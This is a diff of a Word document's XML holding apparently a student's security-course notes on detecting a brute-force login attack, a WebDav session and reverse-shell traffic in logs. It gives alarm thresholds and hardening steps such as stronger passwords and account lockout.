+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Identify at least one way to harden the vulnerable machine that would mitigate this request?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Don’t list anywhere on the website the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Identify the brute force attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Can you identify the packets specifically from hydra?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>User</w:t>
+      </w:r>
+      <w:r>
+        <w:t>_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>agent.original</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> : Mozilla /4.0 (Hydra)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>How many requests were made in the brute force attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>15,574</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>How many requests had the attacker made before discovering the correct password in this one?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>What kind of alarm would you set to detect this behavior in the future and at what threshold?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Too many failed logins attempted | 5 per minute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Identify at least one way to harden the vulnerable machine that would mitigate this attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Use more secure passwords</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Don’t list usernames on the website</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Don’t allow more than 5 failed logins per minute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Lock out account for 10 minutes if exceeds allowable failed logins </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Find the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WebDav</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> session</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>How many requests were made to this directory?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>27</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Which files were requested?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>What kind of alarm would you set to detect this behavior in the future?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Identify at least one way to harden the vulnerable machine that would mitigate this attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Identify reverse shell and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> traffic</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Can you identify </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> session?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">No </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>What kind of alarm would you set to detect this behavior in the future?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Identify at least one way to harden the vulnerable machine that would mitigate this attack?</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
@@ -1322,6 +1863,362 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="2EF47473"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E77AD8BC"/>
+    <w:lvl w:ilvl="0" w:tplc="04090011">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="53397E3B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="193EB284"/>
+    <w:lvl w:ilvl="0" w:tplc="04090011">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6435220B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="F214AD7E"/>
+    <w:lvl w:ilvl="0" w:tplc="04090011">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6E0808EE"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E53CF032"/>
+    <w:lvl w:ilvl="0" w:tplc="04090011">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6E976846"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="20C21CCA"/>
@@ -1432,13 +2329,117 @@
       <w:rPr>
         <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
       </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7B4C5B83"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="AD7E4228"/>
+    <w:lvl w:ilvl="0" w:tplc="04090011">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="2">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="4">
     <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
@@ -1838,6 +2839,27 @@
     <w:name w:val="Normal"/>
     <w:qFormat/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading1">
+    <w:name w:val="heading 1"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading1Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="00664A0E"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="240"/>
+      <w:outlineLvl w:val="0"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="paragraph" w:styleId="Heading2">
     <w:name w:val="heading 2"/>
     <w:basedOn w:val="Normal"/>
@@ -1968,6 +2990,19 @@
     <w:rPr>
       <w:color w:val="605E5C"/>
       <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
+    <w:name w:val="Heading 1 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading1"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00664A0E"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
 </w:styles>

--- a/Notes/Project2 Notes.docx
+++ b/Notes/Project2 Notes.docx
@@ -116,8 +116,13 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> modules enable apache</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> modules enable </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>apache</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -433,7 +438,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> against apache server</w:t>
+        <w:t xml:space="preserve"> against </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>apache</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> server</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1639,6 +1652,11 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
